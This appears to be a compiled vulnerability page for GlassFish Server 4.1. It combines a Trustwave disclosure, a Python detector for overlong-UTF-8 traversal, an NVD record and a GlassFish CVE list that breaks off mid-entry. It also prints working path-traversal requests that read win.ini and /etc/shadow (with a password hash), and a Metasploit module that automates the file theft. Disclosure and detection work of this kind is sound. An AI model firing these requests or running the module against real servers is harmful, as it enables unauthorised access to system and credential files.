Glassfish server open source edition 4.1 2 vulnerabilities

Trustwave SpiderLabs Security Advisory TWSL2015-016:
Path Traversal in Oracle GlassFish Server Open Source Edition

Published: 08/27/2015
Version: 1.0

Vendor: Oracle Corporation (Project sponsored by Oracle)
Product: GlassFish Server Open Source Edition
Version affected: 4.1 and prior versions

Product description:
Built using the GlassFish Server Open Source Edition, Oracle GlassFish Server delivers a flexible, lightweight and extensible Java EE 6 platform. It provides a small footprint, fully featured Java EE application server that is completely supported for commercial deployment and is available as a standalone offering.

The Administration Console of Oracle GlassFish Server, which is listening by default on port 4848/TCP, is prone to a directory traversal vulnerability. This vulnerability can be exploited by remote attackers to access sensitive data on the server being authenticated.

Finding 1: Directory traversal
Credit: Piotr Karolak of Trustwave's SpiderLabs

#Proof of Concept on Microsoft Windows installation

The authenticated Directory Traversal vulnerability can be exploited by issuing a specially crafted HTTP GET request utilizing a simple bypass, %C0%2F instead of (/), URL encoding.
Example:

REQUEST
========
GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/json%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF/dojo%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/META-INF%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com/sun%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
GET /theme/com%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini

Cookie: JSESSIONID=5c47a3575077b014449e17877a0c
Accept-Language: en-US
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://a.b.c.d:4848/
Host: a.b.c.d:4848

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.8)
Last-Modified: Mon, 12 Jan 2015 10:00:00 GMT
Transfer-Encoding: chunked

; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
CMC=1
MAPIX=1
MAPIXVER=1.0.0.1
OLEMessaging=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo

The response contains the contents of the "win.ini" file, proving that the server allows remote users to download the contents of system files.
#Proof of Concept on Linux installation

Example:

REQUEST
=======
GET /theme/META-INF/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow/
GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1
Host: a.b.c.d:4848
Accept: */*
Accept-Language: en
Connection: close

RESPONSE
========
HTTP/1.1 200 OK
Server: GlassFish Server Open Source Edition 4.1
X-Powered-By: Servlet/3.1 JSP/2.3 (GlassFish Server Open Source Edition 4.1 Java/Oracle Corporation/1.7)
Last-Modified: Tue, 13 Jan 2015 10:00:00 GMT
Date: Tue, 10 Jan 2015 10:00:00 GMT
Connection: close
Content-Length: 1087

root:!:16436:0:99999:7:::
daemon:*:16273:0:99999:7:::
bin:*:16273:0:99999:7:::
sys:*:16273:0:99999:7:::
sync:*:16273:0:99999:7:::
TRUNCATED
lightdm:*:16273:0:99999:7:::
colord:*:16273:0:99999:7:::
hplip:*:16273:0:99999:7:::
pulse:*:16273:0:99999:7:::
test:$1$Duuk9PXN$IzWNTK/hPfl2jzhHmnrVL.:16436:0:99999:7:::
smmta:*:16436:0:99999:7:::
smmsp:*:16436:0:99999:7:::
mysql:!:16436:0:99999:7:::

Vendor Response:
"We plan to fix this issue in the next major GlassFish Server Open Source Edition release."

Remediation Steps:
No fix is available at this time for the GlassFish Server Open Source Edition release. However, this vulnerability can be mitigated with the use of technologies, such as Web Application Firewalls (WAF) or Intrusion Prevention Systems (IPS). Please note that Oracle GlassFish Server 3.x which is the current commercial release of GlassFish is not affected.
Revision History:
01/12/2015 - Vulnerability disclosed to vendor
02/18/2015 - Notified vendor about the updates to TW security policy
05/19/2015 - Ninety-day deadline exceeded
07/14/2015 - Requested status from vendor
07/31/2015 - Requested status from vendor
08/21/2015 - Notified vendor about public disclosure
08/27/2015 - Advisory published

References
1. https://www.owasp.org/index.php/Path_Traversal
2. https://glassfish.java.net/
3. http://www.oracle.com/us/products/middleware/cloud-app-foundation/glassfish-server/overview/index.html

About Trustwave:
Trustwave helps businesses fight cybercrime, protect data and reduce security risks. With cloud and managed security services, integrated technologies and a team of security experts, ethical hackers and researchers, Trustwave enables businesses to transform the way they manage their information security and compliance programs while safely embracing business imperatives including big data, BYOD and social media. More than 2.5 million businesses are enrolled in the Trustwave TrustKeeper® cloud platform, through which Trustwave delivers automated, efficient and cost-effective data protection, risk management and threat intelligence. Trustwave is a privately held company, headquartered in Chicago, with customers in 96 countries. For more information about Trustwave, visit www.trustwave.com.

About Trustwave SpiderLabs:
SpiderLabs(R) is the advanced security team at Trustwave focused on application security, incident response, penetration testing, physical security and security research. The team has performed over a thousand incident investigations, thousands of penetration tests and hundreds of application security tests globally. In addition, the SpiderLabs Research team provides intelligence through bleeding-edge research and proof of concept tool development to enhance Trustwave's products and services.
https://www.trustwave.com/spiderlabs

Disclaimer:
The information provided in this advisory is provided "as is" without warranty of any kind. Trustwave disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Trustwave or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Trustwave or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.
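
The advisory's only mitigation is filtering at a WAF or IPS, so the following is an added example (not part of the Trustwave advisory or of any GlassFish or vendor code) of the check such a filter needs: collapse overlong UTF-8 sequences such as %c0%af and %c0%ae to the ASCII characters a lenient decoder yields, then test for ".." path segments. The function names and the sample request lines are constructed for this illustration, and the three-byte case goes beyond the two-byte forms shown in the advisory.

```python
"""Flag overlong-UTF-8 path traversal (e.g. %c0%af, %c0%ae) in request targets."""
from urllib.parse import unquote_to_bytes


def collapse_overlong(raw: bytes):
    """Return (normalised_bytes, hits) with overlong sequences shortened.

    An overlong sequence spends two or three bytes on a code point that fits
    in fewer. Strict UTF-8 decoders reject it; lenient ones map it to the
    short form, which is how 0xC0 0xAF ends up acting as '/' after a path
    filter has already looked at the request.
    """
    out = bytearray()
    hits = []  # (offset, hex of the overlong bytes, character it decodes to)
    i = 0
    while i < len(raw):
        b0 = raw[i]
        # Two-byte form: lead bytes 0xC0/0xC1 can only encode U+0000..U+007F.
        if b0 in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            cp = ((b0 & 0x1F) << 6) | (raw[i + 1] & 0x3F)
            hits.append((i, raw[i:i + 2].hex(), chr(cp)))
            out.append(cp)
            i += 2
            continue
        # Three-byte form: 0xE0 followed by 0x80..0x9F encodes below U+0800.
        if (b0 == 0xE0 and i + 2 < len(raw)
                and 0x80 <= raw[i + 1] <= 0x9F and 0x80 <= raw[i + 2] <= 0xBF):
            cp = ((raw[i + 1] & 0x3F) << 6) | (raw[i + 2] & 0x3F)
            hits.append((i, raw[i:i + 3].hex(), chr(cp)))
            out.extend(chr(cp).encode("utf-8"))
            i += 3
            continue
        out.append(b0)
        i += 1
    return bytes(out), hits


def has_dotdot(path: bytes) -> bool:
    """True if any path segment is exactly '..' (either slash style)."""
    return b".." in path.replace(b"\\", b"/").split(b"/")


def classify(target: str) -> dict:
    """Inspect one request target (path plus optional query string)."""
    raw = unquote_to_bytes(target.split("?", 1)[0])
    normalised, hits = collapse_overlong(raw)
    return {
        "overlong": bool(hits),
        "traversal": has_dotdot(normalised),
        # Traversal visible only after normalisation: a filter that checks
        # the percent-decoded bytes alone lets this through.
        "hidden_traversal": has_dotdot(normalised) and not has_dotdot(raw),
        "normalised": normalised.decode("utf-8", "replace"),
    }


def scan(request_lines):
    """Return (target, verdict) for every request line worth alerting on."""
    findings = []
    for line in request_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        verdict = classify(parts[1])
        if verdict["overlong"] or verdict["traversal"]:
            findings.append((parts[1], verdict))
    return findings


# Constructed sample request lines, patterned on the advisory's requests.
SAMPLE_REQUESTS = [
    "GET /theme/META-INF/prototype%c0%af..%c0%af..%c0%afwindows/win.ini HTTP/1.1",
    "GET /theme/%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afetc%c0%afshadow HTTP/1.1",
    "GET /theme/../../etc/passwd HTTP/1.1",
    "GET /resource/caf%c3%a9.css HTTP/1.1",   # valid two-byte UTF-8, not overlong
    "GET /common/index.jsf HTTP/1.1",
]

if __name__ == "__main__":
    for target, verdict in scan(SAMPLE_REQUESTS):
        print(target, "->", verdict)
```

Rejecting any request whose target contains an overlong sequence is the safer rule; the normalised path is kept so an analyst can see what the server would have resolved.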


CVE-2017-1000028 Detail

Current Description

Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.


Severity

CVSS 3.x Severity and Metrics:
NIST: NVD
Base Score: 7.5 HIGH
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVSS 2.0 Severity and Metrics:
NIST: NVD
Base Score: 5.0 MEDIUM
Vector: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

Weakness Enumeration

CWE-ID: CWE-22
CWE Name: Improper Limitation of a Pathname to a Restricted Directory (‘Path Traversal’)
Source: NIST


Change History

4 change records found

Modified Analysis by NIST, 5/03/2019 2:27:52 PM

Action: Changed
Type: Reference Type
Old Value: https://www.exploit-db.com/exploits/45196/ No Types Assigned
New Value: https://www.exploit-db.com/exploits/45196/ Exploit, Third Party Advisory, VDB Entry

Action: Changed
Type: Reference Type
Old Value: https://www.exploit-db.com/exploits/45198/ No Types Assigned
New Value: https://www.exploit-db.com/exploits/45198/ Exploit, Third Party Advisory, VDB Entry

Action: Changed
Type: Reference Type
Old Value: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory
New Value: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Exploit, Mailing List, Third Party Advisory

CVE Modified by MITRE, 8/17/2018 6:29:01 AM

Action: Added
Type: Reference
New Value: https://www.exploit-db.com/exploits/45198/ [No Types Assigned]

CVE Modified by MITRE, 8/16/2018 6:29:00 AM

Action: Added
Type: Reference
New Value: https://www.exploit-db.com/exploits/45196/ [No Types Assigned]

Initial Analysis by NIST, 7/21/2017 11:50:13 AM

Action: Added
Type: CPE Configuration
New Value: OR *cpe:2.3:a:oracle:glassfish_server:4.1:*:*:*:open_source:*:*:*

Action: Added
Type: CVSS V2
New Value: (AV:N/AC:L/Au:N/C:P/I:N/A:N)

Action: Added
Type: CVSS V3
New Value: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Action: Added
Type: CWE
New Value: CWE-22

Action: Changed
Type: Reference Type
Old Value: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 No Types Assigned
New Value: https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904 Mailing List, Third Party Advisory

Quick Info

CVE Dictionary Entry: CVE-2017-1000028
NVD Published Date: 07/17/2017
NVD Last Modified: 05/03/2019
Source: MITRE

```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::Scanner
  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
      'Description'    => %q{
        This module exploits an unauthenticated directory traversal vulnerability
        which exists in administration console of Oracle GlassFish Server 4.1,
        which is listening by default on port 4848/TCP.
      },
      'References'     =>
        [
          ['CVE', '2017-1000028'],
          ['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
          ['EDB', '39441']
        ],
      'Author'         =>
        [
          'Trustwave SpiderLabs', # Vulnerability discovery
          'Dhiraj Mishra'         # Metasploit module
        ],
      'DisclosureDate' => 'Aug 08 2015',
      'License'        => MSF_LICENSE
    ))

    register_options(
      [
        Opt::RPORT(4848),
        OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
        OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
      ])
  end

  def run_host(ip)
    filename = datastore['FILEPATH']
    # DEPTH copies of the overlong-encoded "/.." sequence, then the file path
    traversal = "%c0%af.." * datastore['DEPTH'] << filename
    res = send_request_raw({
      'method' => 'GET',
      'uri'    => "/theme/META-INF/prototype#{traversal}"
    })

    # Anything other than a 200 response is treated as a failed read
    unless res && res.code == 200
      print_error('Nothing was downloaded')
      return
    end

    vprint_good("#{peer} - #{res.body}")
    # Store the returned file body as loot for the scanned host
    path = store_loot(
      'oracle.traversal',
      'text/plain',
      ip,
      res.body,
      filename
    )
    print_good("File saved in: #{path}")
  end
end
```

Oracle » Glassfish Server : Security Vulnerabilities

Columns: #, CVE ID, CWE ID, # of Exploits, Vulnerability Type(s), Publish Date, Update Date, Score, Gained Access Level, Access, Complexity, Authentication, Conf., Integ., Avail.

1. CVE-2021-3314
CWE ID: 79; Vulnerability Type(s): XSS; Publish Date: 2021-06-25; Update Date: 2021-07-01; Score: 4.3
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: None; Integ.: Partial; Avail.: None
** UNSUPPORTED WHEN ASSIGNED ** Oracle GlassFish Server 3.1.2.18 and below allows /common/logViewer/logViewer.jsf XSS. A malicious user can cause an administrator user to supply dangerous content to the vulnerable page, which is then reflected back to the user and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to victims. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

2. CVE-2018-14324
CWE ID: 798; Vulnerability Type(s): +Info; Publish Date: 2018-07-16; Update Date: 2019-05-20; Score: 10.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Complete; Integ.: Complete; Avail.: Complete
The demo feature in Oracle GlassFish Open Source Edition 5.0 has TCP port 7676 open by default with a password of admin for the admin account. This allows remote attackers to obtain potentially sensitive information, perform database operations, or manipulate the demo via a JMX RMI session, aka a “jmx_rmi remote monitoring and control problem.” NOTE: this is not an Oracle supported product.

3. CVE-2018-3210
Publish Date: 2018-10-17; Update Date: 2019-10-03; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).

4. CVE-2018-3152
Publish Date: 2018-10-17; Update Date: 2019-10-03; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: None; Integ.: None; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).

5. CVE-2018-2911
Vulnerability Type(s): DoS; Publish Date: 2018-10-17; Update Date: 2019-10-03; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all Oracle GlassFish Server accessible data as well as unauthorized access to critical data or complete access to all Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 8.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:L).

6. CVE-2017-1000030
CWE ID: 287; Publish Date: 2017-07-17; Update Date: 2017-07-21; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Java Key Store Password Disclosure vulnerability, that makes it possible to provide an unauthenticated attacker plain text password of administrative user and grant access to the web-based administration interface.

7. CVE-2017-1000029
CWE ID: 200; Vulnerability Type(s): +Info File Inclusion; Publish Date: 2017-07-17; Update Date: 2017-07-21; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Oracle, GlassFish Server Open Source Edition 3.0.1 (build 22) is vulnerable to Local File Inclusion vulnerability, that makes it possible to include arbitrary files on the server, this vulnerability can be exploited without any prior authentication.

8. CVE-2017-1000028
CWE ID: 22; Vulnerability Type(s): Dir. Trav.; Publish Date: 2017-07-17; Update Date: 2019-05-03; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Oracle, GlassFish Server Open Source Edition 4.1 is vulnerable to both authenticated and unauthenticated Directory Traversal vulnerability, that can be exploited by issuing a specially crafted HTTP GET request.

9. CVE-2017-10400
Publish Date: 2017-10-19; Update Date: 2019-10-03; Score: 5.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: None
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration Graphical User Interface). The supported version that is affected is 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N).

10. CVE-2017-10393
Vulnerability Type(s): DoS; Publish Date: 2017-10-19; Update Date: 2019-10-03; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Web Container). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L).

11. CVE-2017-10391
Vulnerability Type(s): DoS; Publish Date: 2017-10-19; Update Date: 2019-10-03; Score: 7.5
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L).

12. CVE-2017-10385
Vulnerability Type(s): DoS; Publish Date: 2017-10-19; Update Date: 2019-10-03; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Web Container). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS 3.0 Base Score 6.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L).

13. CVE-2017-3626
Publish Date: 2017-04-24; Update Date: 2019-10-03; Score: 2.6
Gained Access Level: None; Access: Remote; Complexity: High; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Java Server Faces). The supported version that is affected is 3.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N).

14. CVE-2017-3250
CWE ID: 200; Vulnerability Type(s): DoS +Info; Publish Date: 2017-01-27; Update Date: 2017-01-31; Score: 7.5
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS v3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts).

15. CVE-2017-3249
Vulnerability Type(s): DoS; Publish Date: 2017-01-27; Update Date: 2017-01-31; Score: 7.5
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via LDAP to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data as well as unauthorized read access to a subset of Oracle GlassFish Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle GlassFish Server. CVSS v3.0 Base Score 7.3 (Confidentiality, Integrity and Availability impacts).

16. CVE-2017-3247
Publish Date: 2017-01-27; Update Date: 2019-10-03; Score: 4.3
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: None; Integ.: Partial; Avail.: None
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Core). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Easily exploitable vulnerability allows unauthenticated attacker with network access via SMTP to compromise Oracle GlassFish Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Oracle GlassFish Server accessible data. CVSS v3.0 Base Score 4.3 (Integrity impacts).

17. CVE-2017-3239
CWE ID: 200; Vulnerability Type(s): +Info; Publish Date: 2017-01-27; Update Date: 2017-01-31; Score: 2.1
Gained Access Level: None; Access: Local; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Administration). Supported versions that are affected are 3.0.1 and 3.1.2. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where Oracle GlassFish Server executes to compromise Oracle GlassFish Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle GlassFish Server accessible data. CVSS v3.0 Base Score 3.3 (Confidentiality impacts).

18. CVE-2016-5528
Publish Date: 2017-01-27; Update Date: 2017-01-31; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Vulnerability in the Oracle GlassFish Server component of Oracle Fusion Middleware (subcomponent: Security). Supported versions that are affected are 2.1.1, 3.0.1 and 3.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Oracle GlassFish Server. While the vulnerability is in Oracle GlassFish Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle GlassFish Server. CVSS v3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts).

19. CVE-2016-5519
Publish Date: 2016-10-25; Update Date: 2017-07-29; Score: 6.5
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: ???; Conf.: Partial; Integ.: Partial; Avail.: Partial
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2 allows remote authenticated users to affect confidentiality, integrity, and availability via vectors related to Java Server Faces.

20. CVE-2016-5477
Publish Date: 2016-07-21; Update Date: 2017-09-01; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1 and 3.0.1 allows remote attackers to affect confidentiality via vectors related to Administration.

21. CVE-2016-3608
Publish Date: 2016-07-21; Update Date: 2017-09-01; Score: 5.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Partial; Integ.: None; Avail.: None
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 allows remote attackers to affect confidentiality via vectors related to Administration.

22. CVE-2016-3607
Publish Date: 2016-07-21; Update Date: 2017-09-01; Score: 10.0
Gained Access Level: None; Access: Remote; Complexity: Low; Authentication: Not required; Conf.: Complete; Integ.: Complete; Avail.: Complete
Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 3.0.1 and 3.1.2 allows remote attackers to affect confidentiality, integrity, and availability via vectors related to Web Container.

23. CVE-2016-1950
CWE ID: 119; Vulnerability Type(s): Exec Code Overflow; Publish Date: 2016-03-13; Update Date: 2019-12-27; Score: 6.8
Gained Access Level: None; Access: Remote; Complexity: Medium; Authentication: Not required; Conf.: Partial; Integ.: Partial; Avail.: Partial
Heap-based buffer overflow in Mozilla Network Security Services (NSS) before 3.19.2.3 and 3.20.x and 3.21.x before 3.21.1, as used in Mozilla Firefox before 45.0 and Firefox ESR 38.x before 38.7, allows remote attackers to execute arbitrary code via crafted ASN.1 data in an X.509 certificate.

24. CVE-2015-7182
